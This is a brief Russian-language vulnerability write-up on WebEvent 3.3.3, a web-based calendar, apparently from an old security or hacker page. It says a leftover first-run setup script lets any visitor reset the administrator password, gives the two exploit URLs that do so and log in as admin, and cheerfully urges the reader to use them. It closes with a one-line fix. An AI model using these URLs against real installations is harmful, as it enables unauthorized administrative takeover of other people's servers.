WebEvent - это интерактивный WWW календарь и что-то, типа, организатора твоего распорядка дня и важных событий. Ты можешь просматривать и изменять события в календаре с любого компьютера и при помощи любого браузера. Прореха в безопасности позволяет получить привилегии администратора.
Системы уязвимы:
WebEvent version 3.3.3
Баг связан с тем, что у пользователя есть доступ к перл-файлу, который возникает при запуске программы админом в первый раз. Так что запускай этот файл и получай администратора 🙂
Эксплоит:
http://www.example.com/scripts/we3.3.3/webevent.pl?cmd=firsttime (здесь меняешь админскую инфо, пароль)
http://www.example.com/scripts/we3.3.3/webevent.pl?cmd=login (а отсюда логинишься на сервер)
Фиксим:
Решение очень простое 🙂 Надо удалить firsttime.pl после конфигурирования сервера.
